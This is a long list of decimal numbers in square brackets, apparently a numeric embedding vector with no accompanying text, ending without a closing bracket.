[ -0.03350627049803734, 0.006538517773151398, -0.003890417981892824, 0.02349507436156273, 0.07764852792024612, 0.015489022247493267, 0.02185317873954773, 0.039202045649290085, -0.013367636129260063, -0.013912512920796871, -0.003868622938171029, 0.005209018941968679, -0.019441192969679832, -0.0024047214537858963, -0.008449218235909939, 0.002197668422013521, -0.04257301613688469, 0.01283002458512783, -0.021242918446660042, -0.004994701128453016, -0.01421764399856329, -0.017392456531524658, -0.030484022572636604, 0.023742085322737694, 0.0033437253441661596, 0.03179172798991203, 0.002475555520504713, 0.01692749559879303, 0.012546689249575138, 0.007541090715676546, 0.02828998677432537, 0.004540637135505676, 0.008768878877162933, 0.02693869359791279, 0.03060026280581951, -0.01726168766617775, 0.04754228889942169, 0.08973752707242966, -0.010839409194886684, 0.006364157423377037, 0.009488116018474102, -0.04716450721025467, -0.022289080545306206, -0.004428029526025057, -0.026037830859422684, 0.003959435969591141, 0.01794459857046604, -0.03696442022919655, -0.030164362862706184, 0.021664289757609367, 0.008587253279983997, -0.04356105998158455, -0.014239438809454441, -0.03728407993912697, -0.027534425258636475, -0.04565338417887688, 0.030135301873087883, 0.002268502488732338, -0.001343120471574366, 0.028885718435049057, -0.0045224749483168125, 0.015198421664536, 0.025572869926691055, 0.034610554575920105, -0.01939760334789753, 0.018351439386606216, 0.0009408200858160853, 0.02317541278898716, -0.01496594026684761, 0.025020727887749672, 0.0019088839180767536, -0.007166942115873098, 0.023451482877135277, -0.018642039969563484, 0.021998479962348938, -0.007599210832268, 0.06486209481954575, -0.026589972898364067, -0.009015889838337898, 0.007003479171544313, -0.04353199899196625, 0.024134395644068718, -0.005975478794425726, -0.006502192467451096, 0.010635988786816597, 0.03516269475221634, -0.044955942779779434, -0.0855528712272644, -0.000036012930650031194, -0.04327045753598213, -0.00008979110134532675, -0.0010280002607032657, -0.012953530065715313, -0.045449964702129364, 0.009822307154536247, -0.013142420910298824, 0.002128650899976492, -0.0038504605181515217, -0.009720596484839916, 0.021591639146208763, -0.02939426898956299, -0.010926589369773865, -0.017159976065158844, -0.008354772813618183, 0.03522081673145294, 0.019513843581080437, 0.02201301045715809, -0.026415612548589706, -0.019455723464488983, 0.08101949840784073, 0.038039643317461014, -0.02580535039305687, -0.0395217090845108, 0.019789913669228554, 0.02119932696223259, 0.014421064406633377, -0.015416371636092663, -0.017537757754325867, -0.029016489163041115, 0.021983949467539787, -0.04338669776916504, -0.047426048666238785, 0.01726168766617775, 0.017697587609291077, -0.009677005931735039, 0.019019821658730507, -0.01158770639449358, 0.00019717717077583075, -0.03138488531112671, 0.010410773567855358, -0.009858631528913975, -0.030484022572636604, 0.02167881838977337, 0.00888511911034584, 0.0057611605152487755, 0.014660810120403767, -0.02827545627951622, -0.0024428628385066986, -0.0003058119327761233, -0.020763427019119263, -0.03551141545176506, -0.02446858584880829, 0.01707279682159424, -0.02978658117353916, -0.04161403328180313, -0.014951410703361034, 0.02269592136144638, -0.02892930805683136, -0.03243104740977287, 0.02054547518491745, 0.0014693501871079206, -0.015053121373057365, 0.014283028431236744, 0.0525987446308136, 0.015242011286318302, -0.0015901311999186873, 0.006611167918890715, 0.03109428472816944, -0.036412280052900314, -0.014530039392411709, -0.006792793516069651, -0.01078128907829523, 0.03336096927523613, 0.003427273128181696, -0.006451337598264217, -0.038911446928977966, 0.022463440895080566, -0.0345233753323555, -0.022724982351064682, 0.016331763938069344, -0.0033618879970163107, -0.020516416057944298, -0.01034538820385933, -0.010541543364524841, -0.021257447078824043, -0.004013923462480307, 0.025020727887749672, -0.011718477122485638, -0.024250635877251625, -0.042369596660137177, -0.004885725677013397, -0.0013503856025636196, -0.032954130321741104, -0.030367782339453697, -0.000037800804420839995, -0.018336910754442215, 0.04082941263914108, -0.014777050353586674, -0.008035112172365189, -0.03417465463280678, -0.03074556402862072, -0.021998479962348938, 0.02202753908932209, -0.025776289403438568, 0.006487662438303232, 0.005169061478227377, -0.01191463228315115, -0.02911819890141487, 0.05643467232584953, -0.02057453617453575, 0.04914059489965439, -0.012866349890828133, -0.011122745461761951, -0.024105334654450417, -0.02874041721224785, 0.03992854803800583, 0.0016400782624259591, 0.030629323795437813, -0.0542261078953743, -0.01643347553908825, -0.013948838226497173, 0.0063968501053750515, 0.02567457966506481, 0.026502791792154312, -0.026008769869804382, 0.027534425258636475, -0.000225442650844343, -0.017130916938185692, 0.006513090338557959, 0.018511271104216576, 0.008238532580435276, 0.010548808611929417, -0.04228241369128227, 0.009153924882411957, -0.02532585896551609, -0.031501125544309616, -0.017842888832092285, 0.012139848433434963, -0.03751656040549278, 0.008362038061022758, 0.008165881969034672, -0.0378362238407135, 0.010054787620902061, -0.0094517907127738, 0.01778476871550083, -0.010810349136590958, -0.03504645451903343, 0.009662476368248463, -0.009175719693303108, 0.0032075061462819576, 0.0023520500399172306, 0.027912205085158348, 0.008790673688054085, 0.013658236712217331, 0.019339483231306076, 0.0427473746240139, -0.022579681128263474, -0.022884812206029892, -0.017537757754325867, 0.034639615565538406, -0.0004050248535349965, 0.025020727887749672, -0.00388678559102118, -0.0058519733138382435, 0.006258814595639706, -0.023611314594745636, -0.000603450695052743, 0.005826545879244804, -0.005110941361635923, 0.00878340844064951, 0.03713878244161606, 0.01856939122080803, 0.0016782195307314396, 0.01675313524901867, 0.01382533274590969, -0.030484022572636604, 0.011616766452789307, -0.005372481886297464, 0.005626757629215717, -0.04155591130256653, -0.01431208848953247, -0.028202807530760765, -0.0018326012650504708, -0.01989162340760231, 0.0008781592478044331, 0.0028388064820319414, 0.03647039830684662, 0.016869375482201576, 0.010497953742742538, 0.009553501382470131, -0.01824972964823246, 0.008870589546859264, -0.0069199311546981335, 0.0197317935526371, 0.03914392739534378, 0.03565671667456627, 0.018671100959181786, -0.0054015424102544785, -0.024076275527477264, 0.02579081989824772, -0.019949743524193764, -0.00402845349162817, -0.02808656543493271, -0.04524654150009155, 0.0035289833322167397, 0.060444965958595276, 0.008805204182863235, 0.0542261078953743, -0.010505218990147114, 0.028566056862473488, -0.023960035294294357, 0.010338122956454754, -0.07863657176494598, 0.03766186162829399, -0.03356439247727394, 0.017494168132543564, 0.00025087021640501916, 0.04867563396692276, -0.019528372213244438, -0.03153018653392792, 0.04719356819987297, -0.021257447078824043, -0.0019288627663627267, -0.015706973150372505, -0.036586638540029526, 0.005463294684886932, 0.004122898913919926, -0.0230301134288311, 0.019833503291010857, -0.04219523444771767, -0.0003414559178054333, -0.005710305646061897, -0.04553714394569397, 0.015125771053135395, -0.014326618984341621, 0.016200993210077286, -0.025267738848924637, -0.04138155281543732, -0.010897529311478138, 0.007918871939182281, 0.006309669464826584, -0.02811562642455101, -0.013120626099407673, -0.026575442403554916, -0.014144993387162685, -0.057945799082517624, -0.012379593215882778, 0.04219523444771767, 0.01958649232983589, -0.014864230528473854, -0.01381080225110054, 0.013905247673392296, -0.0015002265572547913, -0.001112456200644374, 0.04219523444771767, 0.0032111387699842453, 0.004653245210647583, -0.013709092512726784, 0.051552578806877136, -0.023553194478154182, 0.0007682758150622249, 0.010991974733769894, 0.003058573231101036, 0.05012863501906395, -0.00494021363556385, 0.0002987739280797541, 0.02844981662929058, -0.002824276452884078, -0.018801871687173843, -0.005078248679637909, 0.0444328598678112, -0.03737126290798187, 0.02135915867984295, 0.014995000325143337, 0.025514749810099602, -0.00175813480746001, -0.007159676868468523, 0.005441499873995781, -0.01612834446132183, -0.04960555583238602, -0.02496260777115822, -0.0042318738996982574, -0.04417131841182709, 0.01793006807565689, 0.003014983143657446, 0.010483423247933388, 0.01160223688930273, 0.014769785106182098, -0.05291840434074402, 0.03568577766418457, -0.01707279682159424, 0.011093685403466225, -0.001896170200780034, -0.004286361858248711, 0.007984256371855736, 0.0004079762729816139, 0.0197608545422554, 0.00324564753100276, 0.02628484182059765, -0.05114573985338211, -0.017494168132543564, 0.08305370807647705, -0.034639615565538406, -0.0625372901558876, -0.019470252096652985, 0.00698894914239645, -0.041178133338689804, -0.04507218301296234, 0.023219002410769463, -0.0035580433905124664, 0.025369448587298393, -0.01727621629834175, -0.008965034037828445, 0.014043282717466354, 0.00157287681940943, 0.0246865376830101, 0.020589066669344902, -0.04457816109061241, 0.01906341128051281, 0.005169061478227377, -0.011965487152338028, 0.03176266700029373, -0.044781580567359924, -0.018612980842590332, 0.05161070078611374, 0.05986376106739044, 0.02233267016708851, 0.003681548871099949, -0.011398815549910069, 0.010316328145563602, 0.014747990295290947, 0.007007111329585314, -0.017058266326785088, 0.012074463069438934, -0.021780529990792274, -0.002155894646421075, -0.012815495021641254, 0.041323430836200714, 0.06160736829042435, 0.007348567247390747, 0.010650519281625748, -0.0038722555618733168, -0.014951410703361034, -0.03556953743100166, 0.02419251576066017, 0.0031857111025601625, 0.011268045753240585, -0.015271071344614029, 0.018162548542022705, 0.024134395644068718, 0.006095351651310921, 0.007599210832268, 0.0019887990783900023, 0.05146539956331253, -0.015387311577796936, -0.008013316430151463, 0.00009728315490065143, -0.007388525176793337, 0.0025627356953918934, -0.0019070677226409316, -0.005477824714034796, -0.025936121121048927, 0.016825785860419273, -0.02940879948437214, -0.03539517521858215, -0.013120626099407673, -0.030774623155593872, 0.00805690698325634, 0.030803684145212173, 0.0028388064820319414, -0.027984855696558952, 0.01971726305782795, -0.06143300607800484, -0.0027643400244414806, 0.0287840086966753, -0.004395336844027042, -0.018118958920240402, 0.04033539071679115, 0.03368063271045685, -0.02285575121641159, 0.020472826436161995, 0.014566364698112011, 0.024759186431765556, -0.005445132497698069, -0.02234720066189766, 0.028667768463492393, 0.003734220052137971, 0.010309062898159027, 0.007591945584863424, 0.009509910829365253, -0.032779768109321594, -0.03600543737411499, 0.031036164611577988, 0.023117292672395706, 0.04155591130256653, 0.008601783774793148, 0.024265166372060776, -0.010178293101489544, -0.01874375157058239, 0.03748750314116478, 0.003450884483754635, 0.006135309115052223, -0.03260540962219238, -0.015242011286318302, -0.009647945873439312, -0.00612077908590436, -0.039870429784059525, -0.036266978830099106, 0.02550021931529045, 0.002312092576175928, 0.03109428472816944, -0.0017926435684785247, 0.017305277287960052, 0.007998786866664886, 0.02252156101167202, 0.005906461272388697, -0.03487209603190422, 0.03882426396012306, 0.008500073105096817, 0.016041163355112076, -0.004809442907571793, -0.026996813714504242, -0.006553047802299261, -0.05527226999402046, -0.003054940840229392, -0.022143779322504997, 0.003340092720463872, 0.010309062898159027, 0.015910392627120018, -0.02038564532995224, -0.007628270890563726, -0.016477065160870552, -0.023960035294294357, 0.017377927899360657, 0.01692749559879303, 0.01627364382147789, 0.017189037054777145, 0.013287721201777458, -0.015823213383555412, -0.03368063271045685, -0.009582561440765858, -0.015271071344614029, 0.010824879631400108, 0.025863470509648323, -0.023262593895196915, 0.045449964702129364, -0.0025227779988199472, 0.013302250765264034, 0.0028442551847547293, 0.008943239226937294, -0.032808829098939896, 0.04637988656759262, -0.044781580567359924, -0.02103949710726738, 0.01842408999800682, 0.042979855090379715, -0.009168455377221107, -0.00398486340418458, 0.002639018464833498, -0.028391696512699127, 0.008173147216439247, -0.016230054199695587, 0.007079761940985918, 0.00838383287191391, -0.00037482960033230484, 0.007577415555715561, 0.021431807428598404, 0.019804444164037704, 0.012227028608322144, -0.008500073105096817, 0.008579988032579422, -0.019194182008504868, 0.018801871687173843, -0.021577108651399612, 0.0026535484939813614, -0.02167881838977337, 0.012118052691221237, 0.031123343855142593, -0.01775570772588253, -0.013643707148730755, 0.025848940014839172, 0.014566364698112011, -0.025413038209080696, 0.009052214212715626, -0.014784315600991249, 0.009989402256906033, 0.013854392804205418, 0.004428029526025057, -0.007126984186470509, -0.010774023830890656, -0.012633869424462318, -0.022390790283679962, -0.014115933328866959, 0.00268987356685102, 0.030687443912029266, -0.002895110286772251, 0.01382533274590969, 0.007591945584863424, -0.04390978068113327, -0.014595424756407738, -0.020312994718551636, 0.014036018401384354, 0.018206140026450157, 0.0030404108110815287, 0.010774023830890656, 0.02369849383831024, -0.01306977029889822, -0.019673673436045647, 0.032460108399391174, 0.008877853862941265, -0.04178839176893234, 0.009081274271011353, 0.00030876335222274065, 0.017552288249135017, 0.0011215374106541276, 0.010258208028972149, 0.013316781260073185, -0.010410773567855358, -0.02250703051686287, 0.02743271365761757, -0.012779169715940952, 0.010250942781567574, 0.028478877618908882, -0.030338723212480545, 0.023219002410769463, -0.0075628855265676975, 0.028725888580083847, 0.0008722564089111984, 0.006458602380007505, 0.02255062200129032, 0.039405468851327896, -0.03556953743100166, 0.018322380259633064, -0.027229294180870056, 0.017363397404551506, -0.013011650182306767, 0.0024646578822284937, 0.03928922861814499, 0.0020487355068325996, 0.0014175869291648269, -0.025093378499150276, 0.03597637638449669, 0.00006776901136618108, -0.018700160086154938, -0.03347720950841904, 0.021911298856139183, 0.014588159509003162, 0.03170454502105713, -0.029815640300512314, 0.009379140101373196, -0.01708732731640339, -0.0019887990783900023, -0.018307849764823914, 0.035743895918130875, -0.019862564280629158, -0.028667768463492393, 0.002061449456959963, 0.009713331237435341, 0.027723316103219986, 0.025921590626239777, -0.012277883477509022, 0.009945811703801155, 0.013629176653921604, 0.0035998173989355564, 0.021286508068442345, -0.020138634368777275, 0.015154831111431122, 0.02236173115670681, -0.009146659635007381, -0.010120172053575516, -0.025180557742714882, -0.027069464325904846, 0.002940516686066985, -0.011558646336197853, 0.011565911583602428, 0.03481397405266762, -0.008274857886135578, -0.029539570212364197, 0.003334644017741084, -0.003309216583147645, 0.02253609150648117, -0.02237626165151596, -0.05341242626309395, 0.011703946627676487, -0.023800205439329147, 0.0032601775601506233, -0.005641287658363581, 0.015605262480676174, -0.008405627682805061, -0.013643707148730755, 0.0021449970081448555, 0.013186010532081127, -0.025747230276465416, -0.01842408999800682, 0.006683818064630032, -0.004126531071960926, -0.010999239981174469, 0.00777357118204236, -0.009931282140314579, -0.023233532905578613, 0.005470559932291508, -0.013367636129260063, -0.006055394187569618, 0.018816400319337845, 0.004645979963243008, -0.02237626165151596, 0.016883905977010727, 0.03071650303900242, -0.027403654530644417, 0.004558799788355827, -0.04309609532356262, -0.006909033749252558, -0.0028170114383101463, 0.005950051359832287, 0.016971085220575333, 0.028856659308075905, -0.0048748282715678215, 0.013433021493256092, -0.021097617223858833, -0.0004286361509002745, 0.014195848256349564, 0.02483183704316616, -0.006854546256363392, 0.04754228889942169, 0.00855819322168827, 0.0004304524336475879, 0.007399422582238913, -0.004344481974840164, -0.029684871435165405, 0.02661903202533722, 0.02172240987420082, -0.016360824927687645, -0.04504312202334404, -0.02632843144237995, -0.0032783402130007744, -0.0033473577350378036, 0.028333576396107674, 0.025209618732333183, -0.0004218252142891288, 0.019528372213244438, -0.027897676452994347, 0.00781716126948595, 0.021315567195415497, 0.019499313086271286, -0.0028805802576243877, 0.01761040836572647, -0.017334336414933205, -0.03716783970594406, -0.022477971389889717, -0.003476311918348074, -0.025369448587298393, -0.027214763686060905, -0.021649759262800217, -0.042166173458099365, 0.0014484632993116975, -0.004021188244223595, 0.021083086729049683, 0.001411230070516467, 0.035278934985399246, 0.007955196313560009, 0.018976232036948204, -0.03847554326057434, 0.013098830357193947, -0.014835170470178127, 0.0055976975709199905, 0.01267019473016262, -0.0017236259300261736, -0.0006919931038282812, 0.020095044746994972, -0.029873760417103767, 0.0022140147630125284, 0.031675487756729126, -0.016854844987392426, -0.003080368274822831, 0.036731939762830734, 0.0329250693321228, -0.00888511911034584, -0.01990615390241146, 0.023436954244971275, 0.0013358554570004344, -0.009190250188112259, -0.0238583255559206, -0.008391098119318485, 0.0312686450779438, -0.007737245876342058, -0.007366729900240898, 0.015576202422380447, -0.0030204318463802338, -0.014450124464929104, 0.008006052114069462, -0.03684817999601364, -0.010766759514808655, -0.022318141534924507, 0.019659142941236496, -0.000019482171410345472, -0.020327525213360786, 0.02531132847070694, -0.0035598597023636103, -0.028042975813150406, 0.007788101211190224, -0.0014720746548846364, 0.01454456988722086, 0.026342961937189102, -0.02070530690252781, -0.0164189450442791, -0.038911446928977966, 0.01987709477543831, 0.020109575241804123, -0.007548355497419834, -0.010548808611929417, 0.015242011286318302, 0.023306183516979218, -0.01463175006210804, -0.010774023830890656, -0.01907794177532196, -0.008754348382353783, 0.013389430940151215, 0.03556953743100166, -0.025238677859306335, 0.032489169389009476, 0.014689870178699493, 0.002357498975470662, 0.0016391701065003872, 0.01708732731640339, -0.010774023830890656, 0.008805204182863235, 0.024904487654566765, -0.010388977825641632, 0.011485996656119823, 0.009916751645505428, 0.0065603130497038364, 0.0010752229718491435, -0.022492501884698868, -0.020661715418100357, 0.022579681128263474, -0.01447918452322483, -0.0015438166446983814, 0.02515149861574173, 0.014043282717466354, -0.0045115770772099495, 0.013251395896077156, 0.00411563366651535, 0.0148061104118824, 0.02858058735728264, 0.002807930111885071, 0.02268139086663723, 0.018859991803765297, -0.011391551233828068, -0.008173147216439247, 0.0030749195721000433, 0.011362491175532341, 0.0047840154729783535, -0.0188745204359293, -0.011565911583602428, -0.01675313524901867, -0.0172471571713686, -0.009713331237435341, 0.002413802780210972, 0.0411200113594532, 0.0279703252017498, 0.025601929053664207, 0.04193369299173355, -0.03437807410955429, 0.02008051425218582, -0.005179958883672953, 0.013948838226497173, -0.020516416057944298, 0.03440713509917259, 0.0071197194047272205, -0.01627364382147789, 0.0156343225389719, 0.04170121252536774, -0.01553261186927557, -0.005248976871371269, 0.028072036802768707, -0.00772998109459877, 0.02876947820186615, -0.03699348121881485, 0.01974632404744625, -0.007526560686528683, -0.040684111416339874, 0.011980017647147179, -0.00003141553315799683, 0.002849703887477517, 0.023378834128379822, -0.020138634368777275, -0.010359917767345905, 0.018961701542139053, -0.008863324299454689, -0.022289080545306206, -0.021286508068442345, -0.011202660389244556, -0.01241591852158308, -0.007294079754501581, -0.030454963445663452, -0.0016364457551389933, 0.005910093430429697, -0.01662236452102661, -0.006425910163670778, 0.012968060560524464, 0.013832597993314266, -0.010374448262155056, -0.03734220191836357, 0.005158164072781801, 0.015024060383439064, 0.005074616521596909, 0.011304371058940887, 0.0008886027499102056, -0.024715596809983253, 0.00101801089476794, 0.003381866728886962, -0.003216587472707033, -0.015590731985867023, 0.00025132426526397467, -0.01267019473016262, 0.004003026057034731, 0.028725888580083847, -0.004017556086182594, 0.014166788198053837, 0.006654758006334305, 0.006538517773151398, -0.023742085322737694, -0.006309669464826584, -0.02172240987420082, -0.006865443661808968, -0.04187557473778725, -0.003078552195802331, -0.0044316621497273445, 0.006015436258167028, 0.003992128185927868, 0.007018009200692177, 0.007094291970133781, 0.004664142616093159, 0.01184924691915512, 0.004217343870550394, 0.0019397602882236242, -0.010774023830890656, -0.0032075061462819576, 0.006059026345610619, 0.012989855371415615, 0.004126531071960926, -0.029307089745998383, -0.007297712378203869, -0.008732553571462631, -0.000879067403730005, -0.021838650107383728, -0.004217343870550394, 0.015881333500146866, 0.0029841067735105753, -0.01660783588886261, -0.006244284566491842, 0.0076355356723070145, 0.00722869485616684, -0.012219763360917568, 0.006505825091153383, -0.015736032277345657, 0.007926136255264282, -0.005263506900519133, -0.0312395840883255, -0.006211591884493828, -0.03562765568494797, -0.005448764655739069, -0.012553954496979713, -0.01790100894868374, -0.01875828020274639, 0.028725888580083847, -0.03876614570617676, 0.035249873995780945, -0.005815648473799229, 0.009248370304703712, 0.012030872516334057, -0.020923256874084473, -0.0263139009475708, -0.013643707148730755, -0.0034218241926282644, 0.020661715418100357, -0.004402602091431618, 0.024410465732216835, -0.007265019696205854, 0.00871075876057148, -0.02826092764735222, 0.0012005445314571261, 0.03713878244161606, 0.021271977573633194, 0.015721503645181656, 0.026836983859539032, 0.0054015424102544785, -0.025180557742714882, -0.011297105811536312, 0.009829571470618248, 0.0010052970610558987, -0.0002849249867722392, 0.01891811192035675, 0.005971846170723438, -0.005307096987962723, -0.04757134988903999, -0.011812922544777393, 0.031181463971734047, -0.01267019473016262, -0.009909487329423428, 0.0002016042999457568, 0.00714514683932066, 0.001316784881055355, -0.0460021048784256, 0.015140301547944546, -0.023742085322737694, -0.002993188099935651, -0.020589066669344902, -0.0026553648058325052, -0.010621459223330021, 0.006342362146824598, -0.0021359159145504236, -0.008391098119318485, -0.009669741615653038, -0.01662236452102661, 0.014326618984341621, -0.022608742117881775, -0.007751775905489922, 0.017813827842473984, -0.03254728764295578, -0.011689417064189911, 0.05326712504029274, 0.021083086729049683, -0.01941213198006153, 0.014326618984341621, -0.02563099004328251, -0.0002849249867722392, -0.0016500676283612847, -0.005866503342986107, 0.03693535923957825, -0.005241711623966694, 0.012270618230104446, -0.01225608866661787, 0.0119291627779603, 0.004900255706161261, 0.007417585235089064, -0.008543663658201694, -0.011151805520057678, 0.015983043238520622, 0.008449218235909939, 0.009074009954929352, 0.009262899868190289, -0.002965944353491068, -0.003518085926771164, -0.017029207199811935, -0.03699348121881485, -0.03010624274611473, -0.02269592136144638, -0.035104576498270035, 0.006883606314659119, 0.037051599472761154, -0.0213882178068161, -0.023640373721718788, -0.01856939122080803, 0.02253609150648117, 0.022405320778489113, -0.00633509736508131, 0.00422824127599597, -0.0050455559976398945, -0.03833024576306343, 0.03243104740977287, -0.020516416057944298, 0.03914392739534378, -0.015503551810979843, -0.028188277035951614, -0.019789913669228554, -0.0005707581294700503, -0.044955942779779434, -0.011624031700193882, 0.01250309869647026, -0.008812468498945236, -0.0046750400215387344, -0.030135301873087883, -0.021940359845757484, -0.028362637385725975, -0.03007718175649643, -0.006084454245865345, 0.006011803634464741, -0.0014030569000169635, -0.00583744328469038, 0.02169334888458252, 0.01695655658841133, 0.024526705965399742, -0.0037106089293956757, 0.01224155817180872, -0.018206140026450157, 0.017668528482317924, -0.010178293101489544, -0.02202753908932209, -0.023044642060995102, -0.0010388977825641632, -0.012612074613571167, -0.016244584694504738, 0.025209618732333183, -0.032808829098939896, -0.00509641133248806, -0.004308156669139862, -0.015024060383439064, 0.019949743524193764, -0.013454816304147243, -0.019354011863470078, -0.0034799445420503616, -0.0036415911745280027, -0.02102496661245823, 0.003125774674117565, -0.02170787937939167, 0.01479157991707325, 0.03487209603190422, 0.0033037676475942135, -0.014689870178699493, 0.01069410890340805, 0.013701827265322208, 0.00812955666333437, 0.033796872943639755, -0.008187677711248398, -0.002128650899976492, -0.006850913632661104, -0.005089146550744772, 0.019441192969679832, 0.004562432412058115, -0.005535944830626249, 0.010098377242684364, 0.001670954516157508, -0.025035258382558823, -0.0032492801547050476, 0.027708785608410835, 0.01806083880364895, 0.004609655123203993, -0.004391704220324755, 0.016491595655679703, -0.015605262480676174, 0.011507791467010975, -0.005314361769706011, -0.017668528482317924, -0.0053107296116650105, -0.03402935341000557, -0.01628817431628704, -0.02414892613887787, -0.03684817999601364, -0.009284695610404015, -0.022260021418333054, -0.0011070073815062642, -0.004911153577268124, 0.01429029367864132, -0.02811562642455101, -0.020472826436161995, -0.022739510983228683, -0.011536851525306702, -0.008819733746349812, -0.013265926390886307, -0.0032837889157235622, 0.001737247803248465, 0.006843648385256529, -0.0006883605965413153, 0.005412439815700054, -0.01856939122080803, 0.02349507436156273, 0.0029677606653422117, -0.028507936745882034, -0.005445132497698069, 0.02513696812093258, 0.0022358098067343235, 0.0017953680362552404, 0.012118052691221237, -0.0028424388729035854, -0.002199484733864665, 0.006371422205120325, -0.002924170345067978, -0.0123287383466959, 0.01455183420330286, 0.019688203930854797, -0.010309062898159027, 0.0029332516714930534, 0.011631296947598457, 0.01596851274371147, -0.019310422241687775, 0.037051599472761154, 0.016331763938069344, -0.012147112749516964, -0.0006674737087450922, -0.0075628855265676975, 0.022318141534924507, 0.0329250693321228, -0.009335550479590893, 0.017799299210309982, -0.0035362483467906713, -0.013331310823559761, -0.030193421989679337, 0.019136061891913414, -0.03365157172083855, 0.012561218813061714, -0.012619338929653168, 0.027999386191368103, -0.016796724870800972, 0.0050382912158966064, -0.006066291593015194, -0.005891931243240833, 0.01265566423535347, 0.008529133163392544, 0.037545621395111084, -0.023727554827928543, 0.037225961685180664, 0.01758134737610817, 0.002829725155606866, 0.014079608023166656, -0.010410773567855358, -0.03074556402862072, 0.025689110159873962, 0.01939760334789753, 0.0003203419619239867, 0.0005071891937404871, -0.019688203930854797, -0.007918871939182281, 0.013541996479034424, 0.028522467240691185, 0.0007523836102336645, -0.005557740107178688, -0.05934068188071251, -0.01958649232983589, -0.00804237648844719, -0.0025772657245397568, -0.04515936225652695, 0.02595064975321293, -0.005023761186748743, -0.007599210832268, 0.020022394135594368, -0.03513363376259804, 0.0188745204359293, -0.00995307695120573, 0.032314807176589966, -0.005888298619538546, 0.00666202325373888, 0.017450576648116112, -0.006872708909213543, -0.007715451065450907, 0.024105334654450417, 0.02220189943909645, 0.013956102542579174, -0.0024228841066360474, 0.02529679797589779, 0.025718169286847115, 0.02236173115670681, -0.010439833626151085, 0.01191463228315115, 0.007105189375579357, -0.004206446465104818, -0.006487662438303232, -0.03798152506351471, 0.0057793231680989265, 0.005644920282065868, 0.028362637385725975, -0.014210378751158714, -0.0009925833437591791, -0.003795972792431712, 0.00624791719019413, -0.000693355337716639, 0.0222164299339056, 0.0006652033771388233, -0.009175719693303108, 0.01761040836572647, 0.02547115832567215, -0.010323593392968178, -0.018046308308839798, 0.04335763677954674, -0.02169334888458252, -0.006632963195443153, 0.023960035294294357, -0.02285575121641159, 0.005150898825377226, -0.009575296193361282, -0.0008613588870503008, 0.023872854188084602, 0.031181463971734047, 0.009844101965427399, -0.010853939689695835, -0.013534732162952423, -0.0012005445314571261, 0.002088693203404546, 0.0021704246755689383, 0.02781049534678459, 0.024584826081991196, -0.01759587787091732, 0.021649759262800217, 0.010708639398217201, 0.001436657621525228, 0.00050900544738397, -0.010025727562606335, -0.01612834446132183, 0.01676766574382782, -0.004976538475602865, -0.014246704056859016, 0.005619492847472429, -0.039550766348838806, -0.010686843656003475, -0.006433174945414066, -0.04228241369128227, 0.00805690698325634, 0.0019760853610932827, 0.016404414549469948, 0.011050094850361347, 0.011130010709166527, -0.020981376990675926, -0.015736032277345657, -0.023320714011788368, -0.050913259387016296, 0.004133796319365501, 0.005546842701733112, -0.013207806274294853, -0.028246397152543068, 0.005132736638188362, 0.025209618732333183, -0.0032093224581331015, -0.028507936745882034, 0.010730434209108353, -0.020458295941352844, -0.00723232701420784, 0.014261233620345592, -0.0030458595138043165, 0.0002799303038045764, -0.006258814595639706, -0.02366943471133709, 0.019121531397104263, 0.006059026345610619, 0.0041519589722156525, 0.009328285232186317, 0.008718024007976055, -0.026023300364613533, -0.01577962376177311, 0.01791553944349289, -0.01422490831464529, -0.02497713826596737, -0.003358255373314023, 0.04652518779039383, -0.006433174945414066, -0.03216950595378876, -0.04832690954208374, 0.01694202609360218, -0.0017926435684785247, -0.008202207274734974, -0.009836836718022823, -0.0008890567696653306, 0.001342212432064116, 0.027345534414052963, 0.012604809366166592, 0.02086513675749302, 0.013498406857252121, -0.0008945055305957794, 0.01858391985297203, -0.028406227007508278, -0.013767212629318237, -0.003774177748709917, 0.0013049792032688856, -0.00037097008316777647, -0.027316473424434662, -0.023102762177586555, -0.001484788372181356, 0.013767212629318237, -0.015024060383439064, 0.020472826436161995, -0.010025727562606335, 0.003285605227574706, 0.006186164449900389, 0.01990615390241146, -0.008877853862941265, -0.017043735831975937, 0.022652331739664078, -0.00003482101237750612, -0.020022394135594368, -0.0018026330508291721, -0.008078701794147491, -0.0021431809291243553, -0.0394926480948925, 0.03763280063867569, -0.019993335008621216, -0.005968213547021151, 0.03507551550865173, -0.003926743287593126, -0.0028388064820319414, -0.020443765446543694, -0.0021649759728461504, -0.03251822665333748, 0.01855486072599888, 0.013643707148730755, 0.012757374905049801, 0.01906341128051281, -0.0004981079255230725, 0.0001691387442406267, 0.008928709663450718, 0.03202420845627785, -0.019368542358279228, 0.0007428482640534639, -0.011921897530555725, -0.01421764399856329, -0.04411320015788078, -0.017232626676559448, -0.02693869359791279, 0.0015792336780577898, 0.010723168961703777, 0.017130916938185692, 0.007130616810172796, -0.011631296947598457, 0.0004104736144654453, 0.022783102467656136, -0.01537278201431036, 0.022623270750045776, 0.03647039830684662, -0.018656570464372635, 0.03809776529669762, 0.021155737340450287, 0.01990615390241146, 0.008761613629758358, -0.01692749559879303, 0.002544573275372386, 0.013403961434960365, -0.010163762606680393, -0.00030740114743821323, 0.011238985694944859, 0.018642039969563484, -0.01580868288874626, -0.008579988032579422, -0.0057538957335054874, 0.0027697887271642685, -0.014566364698112011, -0.007962461560964584, -0.001856212504208088, 0.010977445170283318, 0.006527620367705822, -0.0015029509086161852, -0.0024374141357839108, -0.022405320778489113, -0.01322233583778143, -0.016012104228138924, -0.017857419326901436, 0.022405320778489113, -0.0008150443900376558, -0.009735126048326492, -0.03060026280581951, 0.02054547518491745, 0.03583107888698578, 0.0006116238655522466, -0.007417585235089064, 0.005528680048882961, -0.01405054796487093, -0.005946418736129999, -0.007181472145020962, -0.010672314092516899, 0.002368396380916238, -0.03917298465967178, 0.011398815549910069, -0.010701374150812626, -0.002936884295195341, 0.012030872516334057, -0.00871075876057148, -0.01216890849173069, 0.01628817431628704, 0.011856512166559696, -0.0411490723490715, -0.00500923115760088, -0.015125771053135395, 0.015096710994839668, 0.03141394630074501, 0.011282575316727161, 0.03109428472816944, 0.007384892553091049, -0.013672767207026482, 0.009967607446014881, -0.015736032277345657, -0.00032125008874572814, -0.0032946865539997816, -0.009727861732244492, -0.006178899202495813, 0.019673673436045647, -0.006237019319087267, -0.01673860475420952, 0.011304371058940887, -0.02858058735728264, -0.01250309869647026, 0.004667775239795446, 0.003084000898525119, -0.005190856754779816, 0.00494021363556385, 0.0016092018922790885, 0.0064695002511143684, -0.02151898853480816, -0.015518082305788994, 0.009226575493812561, 0.03025154210627079, 0.011769331991672516, -0.011921897530555725, -0.022434381768107414, 0.017959129065275192, -0.022768571972846985, 